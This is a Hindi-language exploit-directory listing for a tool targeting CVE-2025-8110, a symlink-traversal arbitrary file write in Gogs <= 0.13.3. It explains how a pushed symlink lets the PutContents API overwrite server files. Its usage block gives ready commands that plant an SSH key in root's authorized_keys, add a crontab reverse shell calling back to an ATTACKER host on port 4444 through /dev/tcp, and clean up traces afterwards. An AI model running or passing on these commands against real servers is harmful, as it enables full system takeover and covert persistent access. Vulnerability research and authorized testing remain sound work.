Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8110 — CVE-2025-8110 — Gogs <= 0.13.3 PutContents API में सिमलिंक ट्रैवर्सल के माध्यम से मनमानी फ़ाइल लेखन | Kitploit
उपकरण/GitHubGitHub/3jee/cve-2025-8110
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHub3jee/cve-2025-8110

CVE-2025-8110

CVE-2025-8110 — Gogs <= 0.13.3 PutContents API में सिमलिंक ट्रैवर्सल के माध्यम से मनमानी फ़ाइल लेखन

रिपॉजिटरी देखें
24 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8110 — Gogs <= 0.13.3 सिमलिंक ट्रैवर्सल के माध्यम से मनमानी फ़ाइल लेखन

अवलोकन

Gogs <= 0.13.3 PutContents API (/api/v1/repos/:owner/:repo/contents/:path) के माध्यम से मनमानी फ़ाइल लेखन के लिए असुरक्षित है।

API निर्देशिका-ट्रैवर्सल अनुक्रमों (../) के लिए फ़ाइल पथों को मान्य करता है, लेकिन लिखने से पहले प्रतीकात्मक लिंक (सिमलिंक) को हल नहीं करता है। एक प्रमाणित उपयोगकर्ता सर्वर पर किसी भी फ़ाइल की ओर इशारा करने वाला एक सिमलिंक युक्त कमिट पुश कर सकता है, फिर उस सिमलिंक पर PutContents को कॉल करके लक्ष्य फ़ाइल को हमलावर-नियंत्रित सामग्री से ओवरराइट कर सकता है।

जब Gogs रूट (Docker और कई तैनातियों में डिफ़ॉल्ट) के रूप में चलता है, तो इसके परिणामस्वरूप पूर्ण सिस्टम से समझौता होता है।

विवरणमान
CVECVE-2025-8110
प्रभावितGogs <= 0.13.3
प्रकारप्रमाणित मनमानी फ़ाइल लेखन → RCE
CVSS8.8 (उच्च)
घटकPutContents API

आवश्यकताएँ

  • Python 3.10+
  • requests (pip install requests)
  • git CLI
  • एक मान्य Gogs खाता (या लक्ष्य पर खुला स्व-पंजीकरण)

उपयोग

root@kitploit:~
# Self-register a throwaway account + write SSH pubkey for root
python3 CVE-2025-8110.py --url http://target:3001 --register \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# With existing credentials
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# Reverse shell via crontab
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /etc/crontab \
    --content '* * * * * root bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'

# Cleanup the exploit repo after use
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub --cleanup

यह कैसे काम करता है

  1. प्रमाणित करें — लॉग इन करें (या स्व-पंजीकरण करें) और एक API टोकन बनाएँ।
  2. एक रेपो बनाएँ — वेब UI के माध्यम से README के साथ एक नया रिपॉजिटरी आरंभ करें।
  3. एक सिमलिंक पुश करें — रेपो को स्थानीय रूप से क्लोन करें, लक्ष्य फ़ाइल (जैसे /root/.ssh/authorized_keys) की ओर इशारा करने वाला एक सिमलिंक बनाएँ, कमिट करें और पुश करें।
  4. सिमलिंक के माध्यम से लिखें — सिमलिंक फ़ाइलनाम पर PutContents API को कॉल करें। Gogs डिस्क पर सिमलिंक को हल करता है और Gogs प्रक्रिया उपयोगकर्ता (अक्सर रूट) के रूप में वास्तविक फ़ाइल में हमलावर सामग्री लिखता है।

विकल्प

root@kitploit:~
--url             Gogs आधार URL (जैसे http://target:3001)
-u, --user        Gogs उपयोगकर्ता नाम
-p, --password    Gogs पासवर्ड
--register        एक अस्थायी खाता स्व-पंजीकृत करें (कोई कैप्चा नहीं)
--target-file     सर्वर पर ओवरराइट करने का पूर्ण पथ
--content         लिखने के लिए स्ट्रिंग सामग्री
--content-file    स्थानीय फ़ाइल जिसकी सामग्री लिखनी है
--repo            बनाने के लिए रेपो का नाम (डिफ़ॉल्ट: यादृच्छिक)
--link-name       रेपो में सिमलिंक फ़ाइलनाम (डिफ़ॉल्ट: payload)
--cleanup         लिखने के बाद एक्सप्लॉइट रेपो को हटाएँ

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें